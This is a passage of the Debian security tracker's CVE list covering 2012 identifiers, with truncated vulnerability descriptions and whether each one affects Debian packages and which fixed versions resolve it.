CVE-2012-1867 (Integer overflow in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2012-1866 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...)
	NOT-FOR-US: Microsoft Windows
CVE-2012-1865 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...)
	NOT-FOR-US: Microsoft Windows
CVE-2012-1864 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...)
	NOT-FOR-US: Microsoft Windows
CVE-2012-1863 (Cross-site scripting (XSS) vulnerability in Microsoft Office ...)
	NOT-FOR-US: Microsoft Office
CVE-2012-1862 (Open redirect vulnerability in Microsoft Office SharePoint Server 2007 ...)
	NOT-FOR-US: Microsoft SharePoint
CVE-2012-1861 (Cross-site scripting (XSS) vulnerability in Microsoft SharePoint ...)
	NOT-FOR-US: Microsoft SharePoint
CVE-2012-1860 (Microsoft Office SharePoint Server 2007 SP2 and SP3, SharePoint Server ...)
	NOT-FOR-US: Microsoft SharePoint
CVE-2012-1859 (Cross-site scripting (XSS) vulnerability in scriptresx.ashx in ...)
	NOT-FOR-US: Microsoft SharePoint
CVE-2012-1858 (The toStaticHTML API (aka the SafeHTML component) in Microsoft ...)
	NOT-FOR-US: Microsoft Internet Explorer, Communicator, Lync
CVE-2012-1857 (Cross-site scripting (XSS) vulnerability in the Enterprise Portal ...)
	NOT-FOR-US: Microsoft Dynamics AX
CVE-2012-1856 (The TabStrip ActiveX control in the Common Controls in MSCOMCTL.OCX in ...)
	NOT-FOR-US: Microsoft
CVE-2012-1855 (Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not ...)
	NOT-FOR-US: Microsoft .NET Framework
CVE-2012-1854 (Untrusted search path vulnerability in VBE6.dll in Microsoft Office ...)
	NOT-FOR-US: Microsoft Office
CVE-2012-1853 (Stack-based buffer overflow in the Remote Administration Protocol ...)
	NOT-FOR-US: Microsoft Windows XP
CVE-2012-1852 (Heap-based buffer overflow in the Remote Administration Protocol (RAP) ...)
	NOT-FOR-US: Microsoft Windows XP
CVE-2012-1851 (Format string vulnerability in the Print Spooler service in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2012-1850 (The Remote Administration Protocol (RAP) implementation in the ...)
	NOT-FOR-US: Microsoft Windows
CVE-2012-1849 (Untrusted search path vulnerability in Microsoft Lync 2010, 2010 ...)
	NOT-FOR-US: Microsoft Lync, Attendee, Attendant
CVE-2012-1848 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...)
	NOT-FOR-US: Microsoft Windows
CVE-2012-1847 (Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; ...)
	NOT-FOR-US: Microsoft Excel
CVE-2012-1846 (Google Chrome 17.0.963.66 and earlier allows remote attackers to ...)
	- chromium-browser 20.0.1132.21~r139451-1
CVE-2012-1845 (Use-after-free vulnerability in Google Chrome 17.0.963.66 and earlier ...)
	- chromium-browser 20.0.1132.21~r139451-1
CVE-2012-1844 (The Quantum Scalar i500 tape library with firmware before i7.0.3 ...)
	NOT-FOR-US: Quantum Scalar
CVE-2012-1843 (Cross-site request forgery (CSRF) vulnerability in saveRestore.htm on ...)
	NOT-FOR-US: Quantum Scalar
CVE-2012-1842 (Cross-site scripting (XSS) vulnerability in checkQKMProg.htm on the ...)
	NOT-FOR-US: Quantum Scalar
CVE-2012-1841 (Absolute path traversal vulnerability in logShow.htm on the Quantum ...)
	NOT-FOR-US: Quantum Scalar
CVE-2012-1840 (AjaXplorer 3.2.x before 3.2.5 and 4.0.x before 4.0.4 does not properly ...)
	NOT-FOR-US: AjaXplorer
CVE-2012-1839 (Multiple directory traversal vulnerabilities in the Get Template ...)
	NOT-FOR-US: AjaXplorer
CVE-2012-1838 (The web management interface on the LG-Nortel ELO GS24M switch allows ...)
	NOT-FOR-US: Nortel switch
CVE-2012-1837 (The (1) webreports, (2) post/create-role, and (3) post/update-role ...)
	NOT-FOR-US: Tivoli
CVE-2012-1836 (Heap-based buffer overflow in dns.cpp in InspIRCd 2.0.5 might allow ...)
	{DSA-2448-1}
	- inspircd 2.0.5-0.1 (bug #667914)
CVE-2012-1835 (Multiple cross-site scripting (XSS) vulnerabilities in the All-in-One ...)
	NOT-FOR-US: All-in-One Event Calendar plugin for WordPress
CVE-2012-1834
	RESERVED
CVE-2012-1833 (VMware SpringSource Grails before 1.3.8, and 2.x before 2.0.2, does ...)
	NOT-FOR-US: Grails
CVE-2012-1832 (WellinTech KingView 6.53 allows remote attackers to execute arbitrary ...)
	NOT-FOR-US: WellinTech KingView not in Debian
CVE-2012-1831 (Heap-based buffer overflow in WellinTech KingView 6.53 allows remote ...)
	NOT-FOR-US: WellinTech KingView not in Debian
CVE-2012-1830 (Stack-based buffer overflow in WellinTech KingView 6.53 allows remote ...)
	NOT-FOR-US: WellinTech KingView not in Debian
CVE-2012-1829 (Multiple cross-site scripting (XSS) vulnerabilities in AutoFORM PDM ...)
	NOT-FOR-US: AutoFORM PDM Archive
CVE-2012-1828 (The administrative functions in AutoFORM PDM Archive before 7.1 do not ...)
	NOT-FOR-US: AutoFORM PDM Archive
CVE-2012-1827 (The web service in AutoFORM PDM Archive before 7.1 does not have ...)
	NOT-FOR-US: AutoFORM PDM Archive
CVE-2012-1826 (dotCMS 1.9 before 1.9.5.1 allows remote authenticated users to execute ...)
	NOT-FOR-US: dotCMS not in Debian
CVE-2012-1825 (Multiple cross-site scripting (XSS) vulnerabilities in the status ...)
	NOT-FOR-US: ForeScout CounterACT
CVE-2012-1824 (Untrusted search path vulnerability in Measuresoft ScadaPro Client ...)
	NOT-FOR-US: Measuresoft ScadaPro
CVE-2012-1823 (sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when ...)
	{DSA-2465-1}
	- php5 5.4.3-1
	NOTE: http://ompldr.org/vZGxxaQ https://bugs.php.net/bug.php?id=61910
	NOTE: 5.4.2-1 'fixed' this, but fix is incomplete: CVE-2012-2311
CVE-2012-1822
	RESERVED
CVE-2012-1821 (The Network Threat Protection module in the Manager component in ...)
	NOT-FOR-US: Symantec Endpoint Protection on Windows Server 2003
CVE-2012-1820 (The bgp_capability_orf function in bgpd in Quagga 0.99.20.1 and ...)
	{DSA-2497-1}
	- quagga 0.99.21-3 (bug #676510)
CVE-2012-1819 (Untrusted search path vulnerability in WellinTech KingView 6.53 allows ...)
	NOT-FOR-US: WellinTech KingView
CVE-2012-1818 (An unspecified ActiveX control in Emerson DeltaV and DeltaV ...)
	NOT-FOR-US: DeltaV (SCADA system) not in Debian
CVE-2012-1817 (Buffer overflow in Emerson DeltaV and DeltaV Workstations 9.3.1, ...)
	NOT-FOR-US: DeltaV (SCADA system) not in Debian
CVE-2012-1816 (PORTSERV.exe in Emerson DeltaV and DeltaV Workstations 9.3.1, 10.3.1, ...)
	NOT-FOR-US: DeltaV (SCADA system) not in Debian
CVE-2012-1815 (SQL injection vulnerability in Emerson DeltaV and DeltaV Workstations ...)
	NOT-FOR-US: DeltaV (SCADA system) not in Debian
CVE-2012-1814 (Cross-site scripting (XSS) vulnerability in Emerson DeltaV and DeltaV ...)
	NOT-FOR-US: DeltaV (SCADA system) not in Debian
CVE-2012-1813 (eosfailoverservice.exe in C3-ilex EOScada before 11.0.19.2 allows ...)
	NOT-FOR-US: C3-ilex EOScada
CVE-2012-1812 (eosfailoverservice.exe in C3-ilex EOScada before 11.0.19.2 allows ...)
	NOT-FOR-US: C3-ilex EOScada
CVE-2012-1811 (EOSDataServer.exe in C3-ilex EOScada before 11.0.19.2 allows remote ...)
	NOT-FOR-US: C3-ilex EOScada
CVE-2012-1810 (EOSCoreScada.exe in C3-ilex EOScada before 11.0.19.2 allows remote ...)
	NOT-FOR-US: C3-ilex EOScada
CVE-2012-1809 (The web server in the ECOM Ethernet module in Koyo H0-ECOM, ...)
	NOT-FOR-US: Koyo ECOM
CVE-2012-1808 (The web server in the ECOM Ethernet module in Koyo H0-ECOM, ...)
	NOT-FOR-US: Koyo ECOM
CVE-2012-1807 (Cross-site scripting (XSS) vulnerability in the web server in the ECOM ...)
	NOT-FOR-US: Koyo ECOM
CVE-2012-1806 (The ECOM Ethernet module in Koyo H0-ECOM, H0-ECOM100, H2-ECOM, ...)
	NOT-FOR-US: Koyo ECOM
CVE-2012-1805 (Buffer overflow in the ECOM Ethernet module in Koyo H0-ECOM, ...)
	NOT-FOR-US: Koyo ECOM
CVE-2012-1804 (The OPC server in Progea Movicon before 11.3 allows remote attackers ...)
	NOT-FOR-US: Progea Movicon
CVE-2012-1803 (RuggedCom Rugged Operating System (ROS) 3.10.x and earlier has a ...)
	NOT-FOR-US: RuggedCom Rugged Operating System
CVE-2012-1802 (Buffer overflow in the embedded web server on the Siemens Scalance X ...)
	NOT-FOR-US: Siemens Scalance X
CVE-2012-1801 (Multiple stack-based buffer overflows in (1) COM and (2) ActiveX ...)
	NOT-FOR-US: ABB WebWare
CVE-2012-1800 (Stack-based buffer overflow in the Profinet DCP protocol ...)
	NOT-FOR-US: Siemens Scalance S
CVE-2012-1799 (The web server on the Siemens Scalance S Security Module firewall S602 ...)
	NOT-FOR-US: Siemens Scalance S
CVE-2012-1798 (The TIFFGetEXIFProperties function in coders/tiff.c in ImageMagick ...)
	{DSA-2462-1}
	- imagemagick 8:6.7.4.0-4 (bug #667635)
CVE-2012-1797 (IBM DB2 9.5 uses world-writable permissions for nodes.reg, which has ...)
	NOT-FOR-US: IBM DB2
CVE-2012-1796 (Unspecified vulnerability in IBM Tivoli Monitoring Agent (ITMA), as ...)
	NOT-FOR-US: Tivoli
CVE-2012-1795 (webglimpse.cgi in Webglimpse before 2.20.0 allows remote attackers to ...)
	NOT-FOR-US: Webglimpse
CVE-2012-1794
	RESERVED
CVE-2012-1793
	RESERVED
CVE-2012-1792 (Cross-site scripting (XSS) vulnerability in ...)
	NOT-FOR-US: OSCommerce Online Merchant
CVE-2012-1791
	RESERVED
CVE-2012-1777 (SQL injection vulnerability in my.activation.php3 in F5 FirePass 6.0.0 ...)
	NOT-FOR-US: F5 Firepass
CVE-2012-1776 (Multiple heap-based buffer overflows in VideoLAN VLC media player ...)
	- vlc 2.0.1-1 (low)
CVE-2012-1775 (Stack-based buffer overflow in VideoLAN VLC media player before 2.0.1 ...)
	- vlc 2.0.1-1 (low)
CVE-2011-5083 (Unrestricted file upload vulnerability in inc/swf/swfupload.swf in ...)
	- dotclear (low; bug #670227)
	NOTE: Post-authentication; vulnerability is actually in admin/media.php.
CVE-2012-1790 (Absolute path traversal vulnerability in Webgrind 1.0 and 1.0.2 allows ...)
	NOT-FOR-US: Webgrind
CVE-2012-1789 (Multiple cross-site scripting (XSS) vulnerabilities in Kongreg8 1.7.3 ...)
	NOT-FOR-US: Kongreg8
CVE-2012-1788 (Multiple cross-site scripting (XSS) vulnerabilities in wonderdesk.cgi ...)
	NOT-FOR-US: WonderDesk SQL
CVE-2012-1787 (Multiple cross-site scripting (XSS) vulnerabilities in wgarcmin.cgi in ...)
	NOT-FOR-US: Webglimpse
CVE-2012-1786 (The Media Upload form in the Video Embed & Thumbnail Generator plugin ...)
	NOT-FOR-US: Media Upload form in the Video Embed & Thumbnail Generator plugin for WordPress
CVE-2012-1785 (kg_callffmpeg.php in the Video Embed & Thumbnail Generator plugin ...)
	NOT-FOR-US: Video Embed & Thumbnail Generator plugin for WordPress
CVE-2012-1784 (SQL injection vulnerability in MyJobList 0.1.3 allows remote attackers ...)
	NOT-FOR-US: MyJobList
CVE-2012-1783 (Tiny Server 1.1.9 and earlier allows remote attackers to cause a ...)
	NOT-FOR-US: Tiny Server
CVE-2012-1782 (Multiple cross-site scripting (XSS) vulnerabilities in questions/ask ...)
	NOT-FOR-US: OSQA
CVE-2012-1781 (Multiple cross-site scripting (XSS) vulnerabilities in ...)
	NOT-FOR-US: SocialCMS
CVE-2012-1780 (SQL injection vulnerability in search.php in SocialCMS 1.0.5 allows ...)
	NOT-FOR-US: SocialCMS
CVE-2012-1779 (Cross-site scripting (XSS) vulnerability in IDevSpot ...)
	NOT-FOR-US: IDevSpot idev-BusinessDirectory
CVE-2012-1778 (SQL injection vulnerability in artykul_print.php in CreateVision CMS ...)
	NOT-FOR-US: CreateVision CMS
CVE-2011-5082 (Cross-site scripting (XSS) vulnerability in the s2Member Pro plugin ...)
	NOT-FOR-US: s2Member Pro plugin for WordPress
CVE-2010-5086 (Directory traversal vulnerability in wiki/rankings.php in Bitweaver ...)
	NOT-FOR-US: Bitweaver
CVE-2009-5114 (Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 ...)
	NOT-FOR-US: WebGlimpse
CVE-2009-5113 (Cross-site scripting (XSS) vulnerability in wgarcmin.cgi in WebGlimpse ...)
	NOT-FOR-US: WebGlimpse
CVE-2009-5112 (wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers ...)
	NOT-FOR-US: WebGlimpse
CVE-2012-1774 (Unspecified vulnerability in the Open URL feature in Gretech GOM Media ...)
	NOT-FOR-US: Gretech GOM Media Player
CVE-2012-1773 (Unspecified vulnerability in the Oracle Outside In Technology ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2012-1772 (Unspecified vulnerability in the Oracle Outside In Technology ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2012-1771 (Unspecified vulnerability in the Oracle Outside In Technology ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2012-1770 (Unspecified vulnerability in the Oracle Outside In Technology ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2012-1769 (Unspecified vulnerability in the Oracle Outside In Technology ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2012-1768 (Unspecified vulnerability in the Oracle Outside In Technology ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2012-1767 (Unspecified vulnerability in the Oracle Outside In Technology ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2012-1766 (Unspecified vulnerability in the Oracle Outside In Technology ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2012-1765 (Unspecified vulnerability in Oracle Sun Solaris 10 allows local users ...)
	NOT-FOR-US: Oracle Sun Solaris 10
CVE-2012-1764 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2012-1763 (Unspecified vulnerability in the Oracle Clinical/Remote Data Capture ...)
	NOT-FOR-US: Oracle Industry Applications
CVE-2012-1762 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2012-1761 (Unspecified vulnerability in Oracle Siebel CRM 8.1.1 and 8.2.2 allows ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2012-1760 (Unspecified vulnerability in Oracle Siebel CRM 8.1.1 and 8.2.2 allows ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2012-1759 (Unspecified vulnerability in the Oracle AutoVue component in Oracle ...)
	NOT-FOR-US: Oracle Supply Chain Products Suite
CVE-2012-1758 (Unspecified vulnerability in the Oracle AutoVue component in Oracle ...)
	NOT-FOR-US: Oracle Supply Chain Products Suite
CVE-2012-1757 (Unspecified vulnerability in Oracle MySQL Server 5.5.23 and earlier ...)
	- mysql-5.1 (Only affects 5.5)
	- mysql-5.5 5.5.24+dfsg-1 (bug #682210)
CVE-2012-1756 (Unspecified vulnerability in Oracle MySQL Server 5.5.23 and earlier ...)
	- mysql-5.1 (Only affects 5.5)
	- mysql-5.5 5.5.24+dfsg-1 (bug #682210)
CVE-2012-1755 (Unspecified vulnerability in the PeopleSoft PeopleTools component in ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2012-1754 (Unspecified vulnerability in Oracle Siebel CRM 8.1.1 and 8.2.2 allows ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2012-1753 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2012-1752 (Unspecified vulnerability in Oracle Sun Solaris 11 allows local users ...)
	NOT-FOR-US: Oracle Sun Solaris 11
CVE-2012-1751 (Unspecified vulnerability in the Core RDBMS component in Oracle ...)
	NOT-FOR-US: Oracle Database Server
CVE-2012-1750 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 ...)
	NOT-FOR-US: Oracle Sun Solaris 8, 9, 10, and 11
CVE-2012-1749 (Unspecified vulnerability in the Oracle MapViewer component in Oracle ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2012-1748 (Unspecified vulnerability in the PeopleSoft Enterprise HRMS component ...)
	NOT-FOR-US: Oracle PeopleSoft Products 9.1
CVE-2012-1747 (Unspecified vulnerability in the Network Layer component in Oracle ...)
	NOT-FOR-US: Oracle Database Server
CVE-2012-1746 (Unspecified vulnerability in the Network Layer component in Oracle ...)
	NOT-FOR-US: Oracle Database Server
CVE-2012-1745 (Unspecified vulnerability in the Network Layer component in Oracle ...)
	NOT-FOR-US: Oracle Database Server
CVE-2012-1744 (Unspecified vulnerability in the Oracle Outside In Technology ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2012-1743 (Unspecified vulnerability in the Oracle Clinical Remote Data Capture ...)
	NOT-FOR-US: Oracle Industry Applications
CVE-2012-1742 (Unspecified vulnerability in Oracle Siebel CRM 8.1.1 and 8.2.2 allows ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2012-1741 (Unspecified vulnerability in the Enterprise Manager for Fusion ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2012-1740 (Unspecified vulnerability in the Oracle Application Express Listener ...)
	NOT-FOR-US: Oracle Application Express Listener
CVE-2012-1739 (Unspecified vulnerability in the Oracle E-Business Intelligence ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2012-1738 (Unspecified vulnerability in the Oracle iPlanet Web Server component ...)
	NOT-FOR-US: Oracle Sun Products Suite, iPlanet Web Server
CVE-2012-1737 (Unspecified vulnerability in the Enterprise Manager for Oracle ...)
	NOT-FOR-US: Oracle
CVE-2012-1736 (Unspecified vulnerability in the Oracle MapViewer component in Oracle ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2012-1735 (Unspecified vulnerability in Oracle MySQL Server 5.5.23 and earlier ...)
	- mysql-5.1 (Only affects 5.5)
	- mysql-5.5 5.5.24+dfsg-1 (bug #682210)
CVE-2012-1734 (Unspecified vulnerability in Oracle MySQL Server 5.1.62 and earlier, ...)
	{DSA-2496-1}
	- mysql-5.1 (bug #682212)
	- mysql-5.5 5.5.24+dfsg-1 (bug #682210)
CVE-2012-1733 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2012-1732 (Unspecified vulnerability in Oracle Siebel CRM 8.1.1 and 8.2.2 allows ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2012-1731 (Unspecified vulnerability in Oracle Siebel CRM 8.1.1 and 8.2.2 allows ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2012-1730 (Unspecified vulnerability in the Oracle Application Object Library ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2012-1729 (Unspecified vulnerability in the Hyperion BI+ component in Oracle ...)
	NOT-FOR-US: Oracle Hyperion
CVE-2012-1728 (Unspecified vulnerability in the Oracle Siebel CRM 8.1.1 and 8.2.2 ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2012-1727 (Unspecified vulnerability in the Oracle Application Object Library ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2012-1726 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7~u3-2.1.1-1 (bug #677486)
CVE-2012-1725 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	{DSA-2507-1}
	- openjdk-6 6b24-1.11.3-1 (bug #677487)
	- openjdk-7 7~u3-2.1.1-1 (bug #677486)
CVE-2012-1724 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	{DSA-2507-1}
	- openjdk-6 6b24-1.11.3-1 (bug #677487)
	- openjdk-7 7~u3-2.1.1-1 (bug #677486)
CVE-2012-1723 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	{DSA-2507-1}
	- openjdk-6 6b24-1.11.3-1 (bug #677487)
	- openjdk-7 7~u3-2.1.1-1 (bug #677486)
CVE-2012-1722 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (specific to Oracle Java)
	- openjdk-7 (specific to Oracle Java)
CVE-2012-1721 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (specific to Oracle Java)
	- openjdk-7 (specific to Oracle Java)
CVE-2012-1720 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Only affects Java on Solaris)
	- openjdk-7 (Only affects Java on Solaris)
CVE-2012-1719 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	{DSA-2507-1}
	- openjdk-6 6b24-1.11.3-1 (bug #677487)
	- openjdk-7 7~u3-2.1.1-1 (bug #677486)
CVE-2012-1718 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	{DSA-2507-1}
	- openjdk-6 6b24-1.11.3-1 (bug #677487)
	- openjdk-7 7~u3-2.1.1-1 (bug #677486)
CVE-2012-1717 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	{DSA-2507-1}
	- openjdk-6 6b24-1.11.3-1 (bug #677487)
	- openjdk-7 7~u3-2.1.1-1 (bug #677486)
CVE-2012-1716 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	{DSA-2507-1}
	- openjdk-6 6b24-1.11.3-1 (bug #677487)
	- openjdk-7 7~u3-2.1.1-1 (bug #677486)
CVE-2012-1715 (Unspecified vulnerability in the Oracle Application Object Library ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2012-1714 (Unspecified vulnerability in a TList 6 ActiveX control in Oracle ...)
	NOT-FOR-US: Oracle Hyperion Financial Management
CVE-2012-1713 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	{DSA-2507-1}
	- openjdk-6 6b24-1.11.3-1 (bug #677487)
	- openjdk-7 7~u3-2.1.1-1 (bug #677486)
CVE-2012-1712 (Directory traversal vulnerability in the Liferay component in Oracle ...)
	NOT-FOR-US: Oracle Sun GlassFish Web Space Server
CVE-2012-1711 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	{DSA-2507-1}
	- openjdk-6 6b24-1.11.3-1 (bug #677487)
	- openjdk-7 7~u3-2.1.1-1 (bug #677486)
CVE-2012-1710 (Unspecified vulnerability in the Oracle WebCenter Forms Recognition ...)
	NOT-FOR-US: Oracle Fusion
CVE-2012-1709 (Unspecified vulnerability in the Oracle WebCenter Forms Recognition ...)
	NOT-FOR-US: Oracle Fusion
CVE-2012-1708 (Unspecified vulnerability in the Application Express component in ...)
	NOT-FOR-US: Oracle Database
CVE-2012-1707 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2012-1706 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2012-1705 (Unspecified vulnerability in the Server component in Oracle MySQL ...)
	- mysql-5.1
	- mysql-5.5 5.5.29+dfsg-1
CVE-2012-1704 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2012-1703 (Unspecified vulnerability in the MySQL Server component in Oracle ...)
	{DSA-2496-1}
	- mysql-5.1 5.1.62-1 (bug #670636)
	- mysql-5.5 5.5.23-1
CVE-2012-1702 (Unspecified vulnerability in the Server component in Oracle MySQL ...)
	- mysql-5.1
	- mysql-5.5 5.5.29+dfsg-1
CVE-2012-1701 (Unspecified vulnerability in the Siebel CRM component in Oracle Siebel ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2012-1700 (Unspecified vulnerability in the Siebel CRM component in Oracle Siebel ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2012-1699 (The ProcSetEventMask function in difs/events.c in the xfs font server ...)
	- xfs 1:1.0.1-1
CVE-2012-1698 (Unspecified vulnerability in Oracle Sun Solaris 11 allows remote ...)
	NOT-FOR-US: Solaris
CVE-2012-1697 (Unspecified vulnerability in the MySQL Server component in Oracle ...)
	- mysql-5.5 5.5.23-1
CVE-2012-1696 (Unspecified vulnerability in the MySQL Server component in Oracle ...)
	- mysql-5.5 5.5.23-1
CVE-2012-1695 (Unspecified vulnerability in the Oracle JRockit component in Oracle ...)
	NOT-FOR-US: Oracle Fusion
CVE-2012-1694 (Unspecified vulnerability in Oracle Sun Solaris 10 allows remote ...)
	NOT-FOR-US: Solaris
CVE-2012-1693 (Unspecified vulnerability in Oracle SPARC Enterprise M Series Servers ...)
	NOT-FOR-US: Oracle SPARC Enterprise M Series Servers
CVE-2012-1692 (Unspecified vulnerability in Oracle Sun Solaris 10 allows local users ...)
	NOT-FOR-US: Solaris
CVE-2012-1691 (Unspecified vulnerability in Oracle Sun Solaris 11 allows local users ...)
	NOT-FOR-US: Solaris
CVE-2012-1690 (Unspecified vulnerability in the MySQL Server component in Oracle ...)
	{DSA-2496-1}
	- mysql-5.1 5.1.62-1 (bug #670636)
	- mysql-5.5 5.5.23-1
CVE-2012-1689 (Unspecified vulnerability in Oracle MySQL Server 5.1.62 and earlier, ...)
	{DSA-2496-1}
	- mysql-5.1 (bug #682212)
	- mysql-5.5 5.5.24+dfsg-1 (bug #682210)
CVE-2012-1688 (Unspecified vulnerability in the MySQL Server component in Oracle ...)
	{DSA-2496-1}
	- mysql-5.1 5.1.62-1 (bug #670636)
	- mysql-5.5 5.5.23-1
CVE-2012-1687 (Unspecified vulnerability in Oracle Solaris 10 and 11 allows local ...)
	NOT-FOR-US: Oracle Solaris 10 and 11
CVE-2012-1686 (Unspecified vulnerability in the Oracle Business Intelligence ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2012-1685 (Unspecified vulnerability in the Secure Global Desktop component in ...)
	NOT-FOR-US: Oracle Virtualization
CVE-2012-1684 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 ...)
	NOT-FOR-US: Solaris
CVE-2012-1683 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 ...)
	NOT-FOR-US: Solaris
CVE-2012-1682 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u3-2.1.2-1
CVE-2012-1681 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 ...)
	NOT-FOR-US: Solaris
CVE-2012-1680 (Unspecified vulnerability in the Siebel CRM component in Oracle Siebel ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2012-1679 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle FLEXCUBE
CVE-2012-1678 (Unspecified vulnerability in the JD Edwards EnterpriseOne Tools ...)
	NOT-FOR-US: Oracle JD Edwards Products
CVE-2012-1677 (Unspecified vulnerability in the Oracle Application Server Single ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2012-1676 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle FLEXCUBE
CVE-2012-1674 (Unspecified vulnerability in the Siebel Clinical component in Oracle ...)
	NOT-FOR-US: Oracle Siebel
CVE-2012-1673 (SQL injection vulnerability in loginscript.php in e-ticketing allows ...)
	NOT-FOR-US: e-ticketing
CVE-2012-1672 (SQL injection vulnerability in getcity.php in Hotel Booking Portal 0.1 ...)
	NOT-FOR-US: Hotel Booking Portal
CVE-2012-1671 (Directory traversal vulnerability in index.php in phpPaleo 4.8b155 and ...)
	NOT-FOR-US: phpPaleo
CVE-2012-1670 (admin/index.php in PHP Grade Book before 1.9.5 BETA allows remote ...)
	NOT-FOR-US: PHP Grade Book
CVE-2012-1669
	RESERVED
CVE-2012-1668
	RESERVED
CVE-2012-1667 (ISC BIND 9.x before 9.7.6-P1, 9.8.x before 9.8.3-P1, 9.9.x before ...)
	{DSA-2486-1}
	- bind9 1:9.8.1.dfsg.P1-4.1
	- isc-dhcp (issue only affects the named service, which isn't used by isc-dhcp)
CVE-2012-1666 (Untrusted search path vulnerability in VMware Tools in VMware ...)
	NOT-FOR-US: VMware Tools
CVE-2012-1665
	RESERVED
CVE-2012-1664
	RESERVED
CVE-2012-1663 (Double free vulnerability in libgnutls in GnuTLS before 3.0.14 allows ...)
	- gnutls28 3.0.14-1
	- gnutls26 (only GNUTLS 3.0 is affected)
CVE-2012-1662 (CA ARCserve Backup r12.0 through SP2, r12.5 before SP2, r15 through ...)
	NOT-FOR-US: CA ARCserve Backup
CVE-2012-1661 (ESRI ArcMap 9 and ArcGIS 10.0.2.3200 and earlier does not properly ...)
	NOT-FOR-US: ESRI ArcMap, ArcGIS
CVE-2012-1660 (Multiple cross-site scripting (XSS) vulnerabilities in ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1659 (Cross-site scripting (XSS) vulnerability in the Node Recommendation ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1658 (Cross-site scripting (XSS) vulnerability in the Read More Link module ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1657 (Cross-site scripting (XSS) vulnerability in block_class.module in the ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-1656 (SQL injection vulnerability in the Multisite Search module 6.x-2.2 for ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
